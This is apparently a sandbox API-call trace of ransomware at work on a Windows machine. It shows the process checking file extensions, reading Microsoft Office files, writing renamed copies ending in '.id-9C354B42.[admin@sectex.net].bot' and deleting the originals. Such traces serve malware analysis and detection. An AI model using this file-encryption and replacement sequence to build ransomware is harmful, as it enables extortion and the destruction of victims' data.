	[0168.897] lstrlenW (lpString=".doc") returned 4
	[0168.897] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0168.897] lstrlenW (lpString=".docx") returned 5
	[0168.897] lstrcmpiW (lpString1=".docx", lpString2="H.EXE") returned -1
	[0168.897] lstrlenW (lpString=".pdf") returned 4
	[0168.897] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0168.897] lstrlenW (lpString=".xls") returned 4
	[0168.897] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0168.897] lstrlenW (lpString=".xlsx") returned 5
	[0168.897] lstrcmpiW (lpString1=".xlsx", lpString2="H.EXE") returned -1
	[0168.897] lstrlenW (lpString=".ppt") returned 4
	[0168.897] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0168.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE") returned 52
	[0168.897] lstrlenW (lpString=".zip") returned 4
	[0168.897] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0168.897] lstrlenW (lpString=".rar") returned 4
	[0168.897] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0168.898] lstrlenW (lpString=".bz2") returned 4
	[0168.898] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0168.898] lstrlenW (lpString=".7z") returned 3
	[0168.898] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0168.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE") returned 52
	[0168.898] lstrlenW (lpString=".dbf") returned 4
	[0168.898] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0168.898] lstrcmpiW (lpString1=".manifest", lpString2=".bot") returned 1
	[0168.901] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=960) returned 1
	[0168.901] CloseHandle (hObject=0x3a4) returned 1
	[0168.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.manifest")) returned 0x20
	[0168.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.manifest.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.902] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.902] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.manifest.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0168.903] GetLastError () returned 0x0
	[0168.903] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x3c0, lpOverlapped=0x0) returned 1
	[0169.043] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x3d0, lpOverlapped=0x0) returned 1
	[0169.044] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.044] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0169.044] SetEndOfFile (hFile=0x25c) returned 1
	[0169.044] CloseHandle (hObject=0x25c) returned 1
	[0169.044] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.044] SetEndOfFile (hFile=0x3a4) returned 1
	[0169.871] CloseHandle (hObject=0x3a4) returned 1
	[0169.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.898] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.manifest")) returned 1
	[0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.899] lstrlenW (lpString=".doc") returned 4
	[0169.899] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1
	[0169.899] lstrlenW (lpString=".docx") returned 5
	[0169.899] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1
	[0169.899] lstrlenW (lpString=".pdf") returned 4
	[0169.899] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1
	[0169.899] lstrlenW (lpString=".xls") returned 4
	[0169.899] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1
	[0169.899] lstrlenW (lpString=".xlsx") returned 5
	[0169.899] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1
	[0169.899] lstrlenW (lpString=".ppt") returned 4
	[0169.899] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1
	[0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.899] lstrlenW (lpString=".zip") returned 4
	[0169.899] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1
	[0169.899] lstrlenW (lpString=".rar") returned 4
	[0169.899] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1
	[0169.899] lstrlenW (lpString=".bz2") returned 4
	[0169.899] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1
	[0169.899] lstrlenW (lpString=".7z") returned 3
	[0169.899] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1
	[0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.899] lstrlenW (lpString=".dbf") returned 4
	[0169.899] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1
	[0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.899] lstrlenW (lpString=".1cd") returned 4
	[0169.899] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1
	[0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.900] lstrlenW (lpString=".jpg") returned 4
	[0169.900] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.900] lstrlenW (lpString=".doc") returned 4
	[0169.900] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString=".docx") returned 5
	[0169.900] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1
	[0169.900] lstrlenW (lpString=".pdf") returned 4
	[0169.900] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString=".xls") returned 4
	[0169.900] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString=".xlsx") returned 5
	[0169.900] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1
	[0169.900] lstrlenW (lpString=".ppt") returned 4
	[0169.900] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.900] lstrlenW (lpString=".zip") returned 4
	[0169.900] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString=".rar") returned 4
	[0169.900] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString=".bz2") returned 4
	[0169.900] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString=".7z") returned 3
	[0169.900] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1
	[0169.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.900] lstrlenW (lpString=".dbf") returned 4
	[0169.900] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.900] lstrlenW (lpString=".1cd") returned 4
	[0169.900] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1
	[0169.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 61
	[0169.900] lstrlenW (lpString=".jpg") returned 4
	[0169.900] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1
	[0169.901] lstrcmpiW (lpString1=".fdt", lpString2=".bot") returned 1
	[0169.901] lstrlenW (lpString="Hiring Requisition - Customized.fdt") returned 35
	[0169.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition - customized.fdt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.912] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=147537) returned 1
	[0169.912] CloseHandle (hObject=0x1d8) returned 1
	[0169.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition - customized.fdt")) returned 0x20
	[0169.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition - customized.fdt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition - customized.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0169.925] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.925] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition - customized.fdt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.925] GetLastError () returned 0x0
	[0169.926] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x24051, lpOverlapped=0x0) returned 1
	[0169.930] WriteFile (in: hFile=0x118, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x24060, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x24060, lpOverlapped=0x0) returned 1
	[0169.933] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.933] WriteFile (in: hFile=0x118, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x11a, lpOverlapped=0x0) returned 1
	[0169.933] SetEndOfFile (hFile=0x118) returned 1
	[0169.933] CloseHandle (hObject=0x118) returned 1
	[0169.933] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.933] SetEndOfFile (hFile=0x3a4) returned 1
	[0169.938] CloseHandle (hObject=0x3a4) returned 1
	[0169.938] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.938] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition - customized.fdt")) returned 1
	[0169.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.939] lstrlenW (lpString=".doc") returned 4
	[0169.939] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0169.939] lstrlenW (lpString=".docx") returned 5
	[0169.939] lstrcmpiW (lpString1=".docx", lpString2="d.fdt") returned -1
	[0169.939] lstrlenW (lpString=".pdf") returned 4
	[0169.939] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0169.939] lstrlenW (lpString=".xls") returned 4
	[0169.939] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0169.939] lstrlenW (lpString=".xlsx") returned 5
	[0169.939] lstrcmpiW (lpString1=".xlsx", lpString2="d.fdt") returned -1
	[0169.939] lstrlenW (lpString=".ppt") returned 4
	[0169.939] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0169.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.939] lstrlenW (lpString=".zip") returned 4
	[0169.939] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0169.940] lstrlenW (lpString=".rar") returned 4
	[0169.940] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0169.940] lstrlenW (lpString=".bz2") returned 4
	[0169.940] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0169.940] lstrlenW (lpString=".7z") returned 3
	[0169.940] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0169.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.940] lstrlenW (lpString=".dbf") returned 4
	[0169.940] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0169.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.940] lstrlenW (lpString=".1cd") returned 4
	[0169.940] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0169.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.940] lstrlenW (lpString=".jpg") returned 4
	[0169.940] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0169.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.940] lstrlenW (lpString=".doc") returned 4
	[0169.940] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0169.940] lstrlenW (lpString=".docx") returned 5
	[0169.940] lstrcmpiW (lpString1=".docx", lpString2="d.fdt") returned -1
	[0169.940] lstrlenW (lpString=".pdf") returned 4
	[0169.940] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0169.940] lstrlenW (lpString=".xls") returned 4
	[0169.940] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0169.940] lstrlenW (lpString=".xlsx") returned 5
	[0169.940] lstrcmpiW (lpString1=".xlsx", lpString2="d.fdt") returned -1
	[0169.940] lstrlenW (lpString=".ppt") returned 4
	[0169.940] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0169.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.940] lstrlenW (lpString=".zip") returned 4
	[0169.940] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0169.940] lstrlenW (lpString=".rar") returned 4
	[0169.941] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0169.941] lstrlenW (lpString=".bz2") returned 4
	[0169.941] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0169.941] lstrlenW (lpString=".7z") returned 3
	[0169.941] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0169.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.941] lstrlenW (lpString=".dbf") returned 4
	[0169.941] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0169.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.941] lstrlenW (lpString=".1cd") returned 4
	[0169.941] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0169.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt") returned 132
	[0169.941] lstrlenW (lpString=".jpg") returned 4
	[0169.941] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0169.941] lstrcmpiW (lpString1=".FDT", lpString2=".bot") returned 1
	[0169.941] lstrlenW (lpString="POLICIES.FDT") returned 12
	[0169.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\policies.fdt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0169.942] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=97645) returned 1
	[0169.942] CloseHandle (hObject=0x3a4) returned 1
	[0169.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\policies.fdt")) returned 0x20
	[0169.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\policies.fdt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\policies.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0169.943] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.943] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\policies.fdt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.944] GetLastError () returned 0x0
	[0169.944] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x17d6d, lpOverlapped=0x0) returned 1
	[0169.947] WriteFile (in: hFile=0x118, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x17d70, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x17d70, lpOverlapped=0x0) returned 1
	[0169.949] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.949] WriteFile (in: hFile=0x118, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.949] SetEndOfFile (hFile=0x118) returned 1
	[0169.950] CloseHandle (hObject=0x118) returned 1
	[0169.950] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.950] SetEndOfFile (hFile=0x3a4) returned 1
	[0169.953] CloseHandle (hObject=0x3a4) returned 1
	[0169.953] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.953] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\policies.fdt")) returned 1
	[0169.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.954] lstrlenW (lpString=".doc") returned 4
	[0169.954] lstrcmpiW (lpString1=".doc", lpString2=".FDT") returned -1
	[0169.954] lstrlenW (lpString=".docx") returned 5
	[0169.954] lstrcmpiW (lpString1=".docx", lpString2="S.FDT") returned -1
	[0169.954] lstrlenW (lpString=".pdf") returned 4
	[0169.954] lstrcmpiW (lpString1=".pdf", lpString2=".FDT") returned 1
	[0169.954] lstrlenW (lpString=".xls") returned 4
	[0169.954] lstrcmpiW (lpString1=".xls", lpString2=".FDT") returned 1
	[0169.954] lstrlenW (lpString=".xlsx") returned 5
	[0169.954] lstrcmpiW (lpString1=".xlsx", lpString2="S.FDT") returned -1
	[0169.954] lstrlenW (lpString=".ppt") returned 4
	[0169.954] lstrcmpiW (lpString1=".ppt", lpString2=".FDT") returned 1
	[0169.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.954] lstrlenW (lpString=".zip") returned 4
	[0169.954] lstrcmpiW (lpString1=".zip", lpString2=".FDT") returned 1
	[0169.954] lstrlenW (lpString=".rar") returned 4
	[0169.954] lstrcmpiW (lpString1=".rar", lpString2=".FDT") returned 1
	[0169.954] lstrlenW (lpString=".bz2") returned 4
	[0169.954] lstrcmpiW (lpString1=".bz2", lpString2=".FDT") returned -1
	[0169.954] lstrlenW (lpString=".7z") returned 3
	[0169.954] lstrcmpiW (lpString1=".7z", lpString2="FDT") returned -1
	[0169.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.955] lstrlenW (lpString=".dbf") returned 4
	[0169.955] lstrcmpiW (lpString1=".dbf", lpString2=".FDT") returned -1
	[0169.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.955] lstrlenW (lpString=".1cd") returned 4
	[0169.955] lstrcmpiW (lpString1=".1cd", lpString2=".FDT") returned -1
